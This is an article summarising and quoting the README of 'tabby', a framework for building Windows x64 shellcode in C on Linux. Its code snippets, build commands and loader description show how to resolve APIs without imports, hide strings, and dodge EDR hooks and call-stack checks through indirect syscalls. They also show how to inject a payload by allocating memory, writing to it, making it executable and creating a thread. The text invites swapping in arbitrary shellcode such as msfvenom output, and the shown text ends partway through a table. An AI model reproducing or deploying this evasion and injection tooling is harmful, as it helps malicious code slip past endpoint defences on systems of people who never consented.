tabby — A Minimal Position-Independent Windows x64 Shellcode Framework, Built Entirely on Linux

Original text: cocomelonc/tabby README on GitHub — by cocomelonc. The screenshots are reproduced from the repository’s img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.
tabby — a minimal position-independent Windows x64 shellcode framework. Source: original repository.

Executive Summary

tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware Development for Ethical Hackers (2026) course. The pitch: write your payload as a normal sc_main(PVOID base) function in C, let a small entry stub, a PEB walker, an FNV-1a hash table and a stack-string macro handle PIC, base-address recovery, API resolution and shellcode-safe strings — and let an indirect NT syscall dispatcher hide the syscall behind ntdll’s own syscall; ret gadget. The output is a flat shellcode.bin with no PE header, no IAT, no CRT — ready to inject into any Windows x64 process. The whole project is small enough to read end-to-end in one sitting: roughly 500 lines of C plus 80 lines of NASM.

What makes tabby interesting compared to the existing landscape isn’t novelty — every individual technique it uses (RDIP base recovery, PEB+EAT walking, FNV-1a hashed exports, indirect syscalls past EDR hooks) is in the public literature. The interesting part is that everything is laid bare in a small, readable codebase, and the entire build pipeline runs on Linux: mingw-w64 + nasm + a custom linker script + objcopy. No MSVC, no Windows SDK, no Wine. That makes it usable as a study object — you can read the entry stub, the PEB walker, the stack-string macro and the syscall stubs side by side and understand exactly which detection problem each piece solves.

The Four Ideas Holding It Together

cocomelonc structures the README around four concepts that map one-to-one to the framework’s files:

  • Write shellcode in C, not assembly. The framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The hand-written assembly is confined to a ~20-line entry stub and 3-instruction syscall stubs generated by a macro.
  • No PE header, no IAT, no CRT. The output is a flat .bin starting at byte 0 with _start at offset 0. There are no imports — every Windows API is resolved at runtime by FNV-1a hash via a PEB walk + EAT walk. There is no libc — the STACKSTR macro builds strings on the stack so they never appear in .rdata.
  • Indirect syscalls that look clean on the call stack. Instead of executing syscall ourselves (which leaves the shellcode as the return address — flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret bytes already living inside ntdll’s own stub, past any EDR inline hook. The kernel sees a return address inside ntdll.
  • Linux-only toolchain. mingw-w64 + nasm + a custom linker script + objcopy. Zero Windows dependency to build.

Each component answers a specific detection problem:

  • entry.asm — how does shellcode find its own base address? (RDIP)
  • resolve.c — how do we call Windows APIs with no IAT? (PEB + EAT walk)
  • pic.h — how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
  • stubs.asm — how do we bypass EDR hooks on ntdll? (indirect syscalls)
  • syscall.c — how do we get SSNs without hardcoding them? (runtime extraction)
  • flat.ld — how do we produce raw bytes from a normal toolchain? (linker script + objcopy)

cocomelonc positions the project explicitly against the alternatives: code generators like SysWhispers hide these mechanics behind generation steps, and full C2 frameworks like Cobalt Strike are too big to study end-to-end. tabby is described as the minimum viable framework that makes each technique inspectable.

What It Is Not

Three sharp negatives from the README that are worth restating before anyone misreads the project:

  • Not a C2 or post-exploitation framework.
  • Not a packer or crypter for existing PE files.
  • Not a polished offensive tool. It is a teaching framework for the Malware Development for Ethical Hackers trainings. The README is structured around why each design decision was made — the project-structure rationale table is the spine of the documentation.

Core Concept 1 — Position-Independent Code

A normal Windows EXE assumes a fixed load address. The linker bakes absolute addresses for every function call, global variable and string literal into the binary. Move the code somewhere else in memory and those absolute addresses become garbage; the process crashes on the first dereference. Shellcode, by definition, must run no matter where it lands.

On x86-64 the basics are easier than on 32-bit because CALL rel32 and LEA reg, [rip+N] are already RIP-relative by design. The remaining problems are specific:

  • Strings and constants. The compiler normally places them in .rdata at a fixed address. tabby merges .rdata into .text via the linker script and uses STACKSTR to materialise strings on the stack at runtime.
  • Global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. They live in .text too; the linker script discards .data and .bss.
  • _start at byte 0. The entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.

The entry stub (asm/entry.asm) uses the classic RDIP trick to recover its own load address:

  call  .here
.here:
  pop   rcx                     ; rcx = runtime address of .here
  sub   rcx, (.here - _start)   ; rcx = base of shellcode

This gives sc_main() a pointer to the shellcode’s own base, which is useful when you embed a secondary payload or config block after the code (the demo example/alloc_exec.c does exactly this).
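
As a rough illustration of why the base pointer matters, the sketch below locates a data block appended after the code. The trailer_at helper and its code_size parameter are hypothetical names, not part of tabby; in a real build the offset would have to come from the build itself (for example the size of the linked code).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: given the runtime base recovered by the entry stub
 * and the build-time size of the code, return a pointer to whatever was
 * appended after it (config block, second-stage payload, ...). */
const uint8_t *trailer_at(const void *base, size_t code_size)
{
    assert(base != NULL);
    /* Pure pointer arithmetic relative to base: no absolute address is
     * baked in, so the result is valid wherever the blob was loaded. */
    return (const uint8_t *)base + code_size;
}
```

Because the result is computed from base at runtime, the same bytes work at any load address.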

Core Concept 2 — API Resolution Without Imports

A normal program calls Windows APIs through the Import Address Table. The PE loader fills the IAT for you by calling LoadLibrary and GetProcAddress. A flat shellcode blob has no IAT — you have to find APIs yourself.

The canonical mechanism is a walk of the Process Environment Block (PEB):

gs:[0x60]  ->  PEB
            └─ Ldr  ->  PEB_LDR_DATA
                        └─ InLoadOrderModuleList  (doubly-linked)
                            ├─ ntdll.dll
                            ├─ kernel32.dll
                            └─ ...

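Every loaded DLL is in this list along with its base address and name. Once you have a module base, you walk its Export Address Table (EAT) to find a specific export. The export directory holds three arrays: names, name ordinals and function RVAs. The first two are parallel, and the ordinal found for a name is the index into the function array.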
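
The lookup logic can be sketched in portable C. This is a simplified model, not tabby's resolve_export: the export_view struct and lookup_export_rva are hypothetical names, and the arrays are plain pointers, whereas a real PE reaches them through RVAs stored in IMAGE_EXPORT_DIRECTORY.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified view of an export directory so the lookup can be read
 * (and run) in isolation. */
struct export_view {
    const char *const *names;     /* AddressOfNames: export name strings   */
    const uint16_t    *ordinals;  /* AddressOfNameOrdinals: index per name */
    const uint32_t    *functions; /* AddressOfFunctions: RVA per ordinal   */
    size_t             name_count;
};

/* Returns the RVA of the named export, or 0 if it is not present. */
uint32_t lookup_export_rva(const struct export_view *ev, const char *wanted)
{
    assert(ev != NULL && wanted != NULL);
    for (size_t i = 0; i < ev->name_count; i++) {
        if (strcmp(ev->names[i], wanted) == 0) {
            /* names[i] pairs with ordinals[i]; the ordinal then indexes
             * the function table. names[i] does NOT pair with functions[i]. */
            return ev->functions[ev->ordinals[i]];
        }
    }
    return 0;
}
```

The callable address is the module base plus the returned RVA.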

Doing this by string comparison is noisy and leaves IOCs. tabby hashes the export names instead and compares those. The hash function is FNV-1a 32-bit — fast, well-distributed, trivial to implement without a CRT:

DWORD fnv1a(const char *s) {
  DWORD h = 0x811c9dc5;
  while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
  return h;
}

Pre-computed hash constants live in include/ntapi.h. The tools/hash.py helper generates or verifies them:

$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
  NtAllocateVirtualMemory  ->  0xca67b978u
  ntdll.dll                ->  0xa62a3b3bu
Pre-computing FNV-1a hashes for an ntdll export and a DLL name via tools/hash.py. Source: original repository.

The DLL-name comparison is case-insensitive (the names are lowercased during the LDR walk). Export names are compared case-sensitively because the EAT preserves the original casing of each export.
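
A minimal sketch of the case-insensitive module match, using a mock list in place of the real loader structures. The mod_entry struct, fnv1a_lower_w and find_module_by_hash are hypothetical names; the real list links LDR_DATA_TABLE_ENTRY records, and hashing only the low byte of each UTF-16 unit is an assumption that holds for ASCII module names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for an LDR entry: a circular doubly-linked list
 * node carrying a UTF-16 module name and its base address. */
struct mod_entry {
    struct mod_entry *next, *prev;
    const uint16_t   *name;   /* NUL-terminated UTF-16, original casing */
    void             *base;
};

/* FNV-1a (32-bit) over the ASCII-lowercased low byte of each UTF-16 unit. */
uint32_t fnv1a_lower_w(const uint16_t *s)
{
    assert(s != NULL);
    uint32_t h = 0x811c9dc5u;               /* FNV offset basis */
    while (*s) {
        uint8_t c = (uint8_t)*s++;
        if (c >= 'A' && c <= 'Z') c = (uint8_t)(c + 0x20);
        h ^= c;
        h *= 0x01000193u;                   /* FNV prime */
    }
    return h;
}

/* Walk the list starting after head (a sentinel) until we wrap around. */
void *find_module_by_hash(struct mod_entry *head, uint32_t wanted)
{
    assert(head != NULL);
    for (struct mod_entry *e = head->next; e != head; e = e->next) {
        if (fnv1a_lower_w(e->name) == wanted) return e->base;
    }
    return NULL;
}
```

Lowercasing before hashing means KERNEL32.DLL and kernel32.dll yield the same constant, so one pre-computed hash matches however the loader recorded the name.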

Core Concept 3 — Indirect Syscalls

Calling something like NtAllocateVirtualMemory from shellcode via the normal ntdll export is caught by modern EDRs. The EDR installs an inline hook: it overwrites the first bytes of the ntdll stub with a JMP into its own code, inspects the call, and then either lets it proceed or blocks it.

Direct syscalls bypass the hook by setting up the system-call number (SSN) in EAX and executing syscall ourselves:

  mov  eax, 0x18       ; SSN for NtAllocateVirtualMemory
  mov  r10, rcx        ; NT ABI: r10 must mirror rcx
  syscall

This dodges the inline hook, but it creates a new problem: the syscall instruction now executes from our_shellcode+N, so the address the kernel returns to lies in the shellcode rather than in ntdll!NtAllocateVirtualMemory. Call-stack-aware EDRs flag any syscall whose return address isn’t inside ntdll.

Indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction pair that already exists inside ntdll’s own stub — past the EDR hook. Looking at ntdll!NtAllocateVirtualMemory:

ntdll!NtAllocateVirtualMemory:
  4C 8B D1        mov r10, rcx      <- hook overwrites here
  B8 18 00 00 00  mov eax, 0x18
  0F 05           syscall           <- we jump to here
  C3              ret

Now the return address the kernel sees is inside ntdll. The call stack looks clean.
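
Locating the jump target can be sketched as a byte scan for 0F 05 C3. This is an illustrative helper with a hypothetical name (find_syscall_ret), not the repository's find_syscall_gadget; it works on any byte buffer, so it can be tried without Windows.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Scan a stub for the byte sequence 0F 05 C3 (syscall; ret).
 * Returns the offset of the syscall instruction, or -1 if not found. */
long find_syscall_ret(const uint8_t *stub, size_t len)
{
    assert(stub != NULL);
    for (size_t i = 0; i + 3 <= len; i++) {
        if (stub[i] == 0x0F && stub[i + 1] == 0x05 && stub[i + 2] == 0xC3)
            return (long)i;
    }
    return -1;
}
```

For the simplified stub shown above the scan returns offset 8. A hook that rewrites only the leading bytes does not move the gadget.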

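The SSN itself is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 opcode (0xB8) and reading the 32-bit immediate that follows. This works on a hooked stub as long as the hook leaves the mov eax bytes intact. Note that 0xB8 sits at offset 3, directly after the 3-byte mov r10, rcx, so a 5-byte JMP rel32 written at the very start of the stub overwrites it; in that case the scan is likely to find no valid SSN and return (DWORD)-1: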

static DWORD extract_ssn(PBYTE stub) {
  for (int i = 0; i < 32; i++) {
    if (stub[i] == 0xB8) {
      DWORD ssn = *(DWORD *)(stub + i + 1);
      if (ssn < 0x600) return ssn;   // sanity: no NT SSN is >= 0x600
    }
  }
  return (DWORD)-1;
}
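
The following variation can be exercised on plain byte arrays. It is a sketch, not the repository code: extract_ssn_bounded and SSN_NOT_FOUND are hypothetical names, the explicit length bound and the memcpy read are additions, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SSN_NOT_FOUND 0xFFFFFFFFu

/* Same idea as extract_ssn, but never reads past len and avoids an
 * unaligned pointer cast by copying the immediate out with memcpy. */
uint32_t extract_ssn_bounded(const uint8_t *stub, size_t len)
{
    assert(stub != NULL);
    for (size_t i = 0; i + 5 <= len; i++) {
        if (stub[i] != 0xB8) continue;           /* opcode: mov eax, imm32 */
        uint32_t ssn;
        memcpy(&ssn, stub + i + 1, sizeof ssn);  /* imm32, little-endian host */
        if (ssn < 0x600) return ssn;             /* same sanity bound as above */
    }
    return SSN_NOT_FOUND;
}
```

Fed the clean stub bytes 4C 8B D1 B8 18 00 00 00 0F 05 C3 it returns 0x18. If the first five bytes are replaced by a JMP rel32 whose displacement contains no 0xB8 byte, the opcode is gone and the function returns SSN_NOT_FOUND.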

Core Concept 4 — The Linux-Only Toolchain

A Windows PE is compiled for Windows but the compilation itself is just C and assembly source going through a normal toolchain. mingw-w64 is a complete Win64 cross-compiler that runs on Linux and produces native Windows COFF objects and PE executables. The flat-binary extraction step uses objcopy to peel the .text section out of the PE wrapper. The pipeline as cocomelonc lays it out:

C source  ->  x86_64-w64-mingw32-gcc      ->  Win64 COFF .o
ASM       ->  nasm -f win64               ->  Win64 COFF .o
COFF .o   ->  x86_64-w64-mingw32-ld       ->  PE .elf  (single .text section)
PE .elf   ->  x86_64-w64-mingw32-objcopy  ->  shellcode.bin  (raw bytes)

Nothing in this pipeline touches Windows. The output runs on Windows because the machine code itself is Win64-ABI compliant.

Repository Layout

tabby/
├── include/
│   ├── types.h        windows types from scratch - no SDK, no CRT headers
│   ├── pic.h          FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes
│   └── ntapi.h        NT function pointer types, sc_* declarations, hash constants
├── src/
│   ├── crt.c          sc_memcpy / sc_memset / sc_memcmp / sc_strlen
│   ├── resolve.c      find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget
│   └── syscall.c      SSN extraction + syscall_init()
├── asm/
│   ├── entry.asm      _start at byte 0: RDIP -> sc_main(base)
│   └── stubs.asm      SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)
├── ld/
│   └── flat.ld        linker script: flatten .text and .rdata$* into single .text at offset 0
├── example/
│   ├── exec.c         minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")
│   └── alloc_exec.c   full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx
└── tools/
    ├── hash.py        FNV-1a pre-computation for ntapi.h constants
    └── loader.c       minimal Win64 test loader: maps shellcode.bin and executes it

Building It

Install on Ubuntu / Debian:

sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64
Installing the toolchain. No MSVC, no Windows SDK, no Wine. Source: original repository.

Clone and build:

git clone https://github.com/cocomelonc/tabby
cd tabby
make

Expected output:

nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c     -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin  1760 bytes
Full-stack build output — shellcode.bin at 1760 bytes including the indirect-NT-syscall machinery. Source: original repository.

The single warning (section below image base) is expected because the linker script intentionally places .text at virtual address 0 so the flat binary starts at byte 0.

A smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:

make exec      # produces bin/exec.bin (~416 bytes)
The lean variant: PEB walk plus WinExec, ~416 bytes. Source: original repository.

Verifying the Output Bytes

Disassemble the first bytes on Linux to confirm _start is at offset 0:

ndisasm -b 64 bin/shellcode.bin | head -20

Expected:

00000000  53                push rbx
00000001  57                push rdi
00000002  56                push rsi
00000003  4883EC20          sub rsp,byte +0x20   ; shadow space, preserves 16-byte alignment
00000007  E800000000        call 0xc
0000000C  59                pop rcx              ; <- RDIP trick
0000000D  4883E90C          sub rcx,byte +0xc    ; rcx = base of shellcode
00000011  E8XXXXXXXX        call sc_main
...
0000001E  6690              xchg ax,ax           ; padding to 0x20
00000020  0000              ssn_NtAllocateVirtualMemory  (dd 0, populated at runtime)
00000024  0000              ssn_NtWriteVirtualMemory
...
00000040  0000              g_syscall_gadget (dq 0)
00000048  8B0500000000      mov eax,[rel ssn_NtAllocateVirtualMemory]  ; <- first syscall stub
ndisasm output — _start at offset 0, RDIP sequence at 0x07–0x0D, SSN slots in .text from 0x20, first syscall stub at 0x48. Source: original repository.

The RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery. The SSN slots and the gadget pointer live in .text at offsets 0x20–0x47 so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address. The first syscall stub starts at 0x48.
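
The offsets quoted above follow from simple arithmetic, reproduced here as a small C sketch. The constant and function names are hypothetical; the values are taken from the listing (eight 4-byte SSN slots starting at 0x20, one 8-byte gadget pointer, .here at 0x0C).

```c
#include <assert.h>
#include <stdint.h>

enum {
    SSN_SLOTS_OFF = 0x20, /* first SSN slot, per the ndisasm listing   */
    SSN_SLOT_SIZE = 4,    /* each slot is a NASM `dd 0`                */
    NUM_STUBS     = 8,    /* eight NT functions ship with the framework */
    GADGET_SIZE   = 8,    /* g_syscall_gadget is a `dq 0`              */
    HERE_OFF      = 0x0C  /* offset of .here (the pop rcx) from _start */
};

/* Offset of the index-th SSN slot inside the flat binary. */
uint32_t ssn_slot_offset(unsigned index)
{
    assert(index < NUM_STUBS);
    return SSN_SLOTS_OFF + index * SSN_SLOT_SIZE;
}

/* The gadget pointer follows the last SSN slot. */
uint32_t gadget_offset(void) { return SSN_SLOTS_OFF + NUM_STUBS * SSN_SLOT_SIZE; }

/* The first stub follows the gadget pointer. */
uint32_t first_stub_offset(void) { return gadget_offset() + GADGET_SIZE; }

/* What the entry stub computes: popped address of .here minus its offset. */
uint64_t base_from_here(uint64_t here_runtime) { return here_runtime - HERE_OFF; }
```

With these values the gadget pointer lands at 0x40 and the first stub at 0x48, matching the disassembly.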

Running It on Windows

bin/shellcode.bin is a raw byte blob — not an executable. To run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.

Build the loader

On Linux, cross-compile tools/loader.c with:

make loader

This produces bin/loader.exe via mingw-w64 — still no Windows required.

Cross-compiling loader.exe on Linux with x86_64-w64-mingw32-gcc. Source: original repository.

Deploy and run

Copy both files to the Windows machine and run:

.\loader.exe shellcode.bin
shellcode.bin running on Windows — full indirect-NT-syscall pipeline pops calc.exe. Source: original repository.

Or, to test the smaller standalone shellcode first:

.\loader.exe exec.bin
exec.bin — the PEB-walk-only variant — calling WinExec("calc.exe") directly. Source: original repository.

Both pop calc.exe. The difference: exec.bin calls WinExec directly (PEB walk + EAT walk only) while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory → NtWriteVirtualMemory → NtProtectVirtualMemory → NtCreateThreadEx) using exec.bin’s bytes as the embedded payload. If exec.bin pops calc but shellcode.bin doesn’t, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments), not in the framework basics.

What the loader does

fopen("shellcode.bin", "rb")          // reads the raw bytes
VirtualAlloc(NULL, sz, RW)            // allocates a private RW region
fread -> buf                           // copies shellcode in
VirtualProtect(buf, sz, RWX)          // flips the region to execute-read-write
CreateThread(buf)                     // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle             // cleans up

The region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode’s own .text section at runtime. Without write access the first store would #AV and the thread would die silently.

The loader prints the load address before jumping so you can attach a debugger at the right offset:

[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000

The bundled example payload (example/alloc_exec.c) spawns calc.exe via the following sequence:

  1. Allocate a fresh RW region via NtAllocateVirtualMemory (indirect syscall).
  2. Write an embedded mini-shellcode (PAYLOAD[] = example/exec.c compiled: PEB walk → WinExec("calc.exe")).
  3. Flip the region to RWX via NtProtectVirtualMemory.
  4. Spawn a thread on it via NtCreateThreadEx.
  5. Wait for the thread, close the handle, free the region.

Swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.

Writing Your Own Shellcode

  1. Copy example/alloc_exec.c or example/exec.c as a starting template, or create a new file in example/.
  2. Write an sc_main(PVOID base) function. If you call any sc_Nt* stub, call syscall_init(ntdll) first. base is the runtime address of byte 0 of your shellcode, which is useful if you embed config or a secondary payload after the code.
  3. Add a build rule for your .c file in Makefile and list its .o in C_OBJS (or replace alloc_exec.o).
  4. Run make (or make exec for a variant that excludes the syscall stubs entirely).

Using the PEB resolver

PVOID ntdll    = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);

To resolve any export by name:

typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);

Or with the GETAPI macro:

HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);

Using the indirect syscalls

After syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:

PVOID  region = NULL;
SIZE_T size   = 4096;

NTSTATUS st = sc_NtAllocateVirtualMemory(
    (HANDLE)-1,               // current process 
    &region,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE);

if (!NT_SUCCESS(st)) { /* handle error */ }
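
For readers unfamiliar with NTSTATUS, here is a small sketch of what the NT_SUCCESS check means. The macro mirrors the definition in the Windows headers; whether tabby's own types.h spells it identically is an assumption, and nt_severity_name is a hypothetical helper.

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t NTSTATUS;   /* signed 32-bit, as in the Windows headers */
#define NT_SUCCESS(st) (((NTSTATUS)(st)) >= 0)

/* Severity lives in the top two bits of the status value:
 * 0 success, 1 informational, 2 warning, 3 error. */
const char *nt_severity_name(NTSTATUS st)
{
    static const char *const names[] = {
        "success", "informational", "warning", "error"
    };
    unsigned sev = ((uint32_t)st) >> 30;
    assert(sev < 4);
    return names[sev];
}
```

Because the test is a signed comparison, both warning (0x8xxxxxxx) and error (0xCxxxxxxx) values fail NT_SUCCESS, while informational values (0x4xxxxxxx) pass.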

The set of pre-defined stubs:

function                      args  notes
sc_NtAllocateVirtualMemory    6     allocate memory in a process
sc_NtWriteVirtualMemory       5     write across process boundary
sc_NtProtectVirtualMemory     5     change page protection
sc_NtFreeVirtualMemory        4     release allocation
sc_NtCreateThreadEx           11    spawn thread in local or remote process
sc_NtWaitForSingleObject      3     wait on a handle
sc_NtClose                    1     close a handle
sc_NtTerminateProcess         2     terminate a process
Pre-defined indirect-syscall stubs shipped with tabby. Source: original repository.

Strings — never in .rdata

Don’t write:

const char *msg = "hello";   // ends up in .rdata -> fixed address -> crash

Use STACKSTR instead:

STACKSTR(msg, "hello");      // pushed onto the stack character by character
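
The idea behind a stack string can be sketched by hand. This is not the STACKSTR definition from pic.h (which is not reproduced here); build_hello is a hypothetical function that writes each character with its own store, which compilers typically emit as immediate operands rather than as a copy from a pooled literal.

```c
#include <assert.h>
#include <stddef.h>

/* Build "hello" on the stack one character at a time, then copy it out
 * so the caller can inspect it. Returns the length without the NUL. */
size_t build_hello(char *out, size_t cap)
{
    /* volatile forces one store per character, so the sequence cannot be
     * collapsed into a single copy from a string constant. */
    volatile char s[6];
    s[0] = 'h'; s[1] = 'e'; s[2] = 'l';
    s[3] = 'l'; s[4] = 'o'; s[5] = '\0';

    assert(out != NULL && cap >= sizeof s);
    for (size_t i = 0; i < sizeof s; i++) out[i] = s[i];
    return sizeof s - 1;
}
```

Whether a given compiler and optimisation level keeps every byte out of .rdata should be confirmed by inspecting the generated object, for example with objdump.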

Adding a new NT syscall stub

Step 1. Add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):

global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0

STUB NtOpenProcess, ssn_NtOpenProcess

The STUB macro emits a single, ABI-clean stub — no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.

Step 2. Declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:

extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);

Step 3. Add the hash constant to include/ntapi.h:

#define H_NtOpenProcess  0xXXXXXXXXu

Compute it:

python3 tools/hash.py NtOpenProcess
Generating the FNV-1a hash constant for a new NT export. Source: original repository.

Step 4. Declare the prototype in include/ntapi.h:

NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);
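
Once the stub exists, its arguments still have to be prepared. The sketch below shows one way to fill them, under stated assumptions: the struct layouts follow the documented Windows definitions, tabby's types.h may declare them differently, and prepare_open_process_args is a hypothetical helper. Inside real shellcode the memset would be the framework's sc_memset, since no CRT is linked.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    void *UniqueProcess;                /* target PID, stored pointer-sized */
    void *UniqueThread;
} CLIENT_ID;

typedef struct {
    uint32_t Length;                    /* must be sizeof(OBJECT_ATTRIBUTES) */
    void    *RootDirectory;
    void    *ObjectName;                /* PUNICODE_STRING in the real headers */
    uint32_t Attributes;
    void    *SecurityDescriptor;
    void    *SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

/* Zero the attributes, set the mandatory Length field, and select the
 * target process by PID. */
void prepare_open_process_args(OBJECT_ATTRIBUTES *oa, CLIENT_ID *cid, uintptr_t pid)
{
    assert(oa != NULL && cid != NULL);
    memset(oa, 0, sizeof *oa);
    oa->Length = (uint32_t)sizeof *oa;
    cid->UniqueProcess = (void *)pid;
    cid->UniqueThread  = NULL;
}
```

The two structures would then be passed as the third and fourth arguments of sc_NtOpenProcess, with the desired access mask as the second.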

How Indirect Syscall Dispatch Works, Step by Step

Take sc_NtAllocateVirtualMemory as the example. The C caller looks like:

sc_NtAllocateVirtualMemory((HANDLE)-1, &region, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);

The Win64 calling convention maps this to:

RCX  = (HANDLE)-1
RDX  = &region
R8   = 0
R9   = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE    <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE            <- 6th arg on stack

The stub itself is three instructions:

sc_NtAllocateVirtualMemory:
    mov  eax, dword [rel ssn_NtAllocateVirtualMemory]  ; EAX <- SSN
    mov  r10, rcx                                       ; R10 <- RCX  (NT ABI)
    jmp  qword [rel g_syscall_gadget]

The stub doesn’t touch the stack, doesn’t shift arguments, doesn’t modify RSP. The Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], and the kernel reads them from those offsets after syscall. Nothing extra is needed. At the point of JMP, the register/stack state is:

EAX  = SSN
R10  = (HANDLE)-1                    <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX  = &region                       <- arg 2
R8   = 0                             <- arg 3
R9   = &size                         <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE  <- arg 5
[RSP+0x30] = PAGE_READWRITE          <- arg 6
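
The stack offsets generalise to any argument count. As a worked example (stack_arg_offset is a hypothetical helper, not framework code): at stub entry [rsp] holds the return address and the next 32 bytes are the home space for the four register arguments, so the n-th argument (1-based, n >= 5) sits at rsp + 8*n.

```c
#include <assert.h>
#include <stdint.h>

/* Offset from RSP, at stub entry, of 1-based argument n (n >= 5).
 *   [rsp]              return address (8 bytes)
 *   [rsp+8 .. rsp+27h] home space for RCX, RDX, R8, R9 (32 bytes)
 *   [rsp+28h] onward   stack arguments 5, 6, ... (8 bytes each) */
uint32_t stack_arg_offset(unsigned n)
{
    assert(n >= 5);
    return 8u * n;
}
```

This gives 0x28 and 0x30 for arguments 5 and 6, and 0x58 for the eleventh argument of sc_NtCreateThreadEx.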

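The JMP lands on the syscall; ret bytes inside ntdll’s own NtAllocateVirtualMemory stub, past any EDR hook. The kernel services the call and resumes at the ret that follows the syscall inside ntdll; because the stub was entered with JMP rather than CALL, that ret pops the C caller’s return address and control goes straight back to the calling code. The instruction pointer the kernel (and any scanner that checks only where the syscall was issued) observes is inside ntdll, not inside our shellcode.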

Replacing the Payload

The example/alloc_exec.c demo ships with the compiled bytes of example/exec.c as PAYLOAD[]. To use your own:

static const BYTE PAYLOAD[] = {
  // paste your x64 shellcode bytes here
  0x48, 0x31, 0xc0, ...
};

Regenerate the bytes from a fresh make exec build:

make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
    print('  ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"

Or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array. The framework handles allocation, write, protection flip and thread creation — you only need to provide the bytes.

The Project-Structure Rationale Table

This is the table at the heart of the README. It is a list of every compiler flag, linker option and design decision in tabby, each with the precise reason it’s there. It is reproduced verbatim because the reasoning is the entire point of the project as a teaching artifact.

decision
    reason

-nostdlib -nostdinc -ffreestanding
    zero CRT dependency; everything in the binary came from our own source

-fno-builtin
    prevents GCC emitting implicit memcpy/memset calls to CRT

-mno-red-zone
    Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame

-mcmodel=small
    critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV

-fno-asynchronous-unwind-tables
    suppresses .eh_frame generation; we discard it anyway but this avoids linker noise

-ffunction-sections -fdata-sections + ld --gc-sections
    dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what’s actually called

-Os
    size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls

nasm -f win64
    produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation

SSN slots in .text (via NASM dd 0)
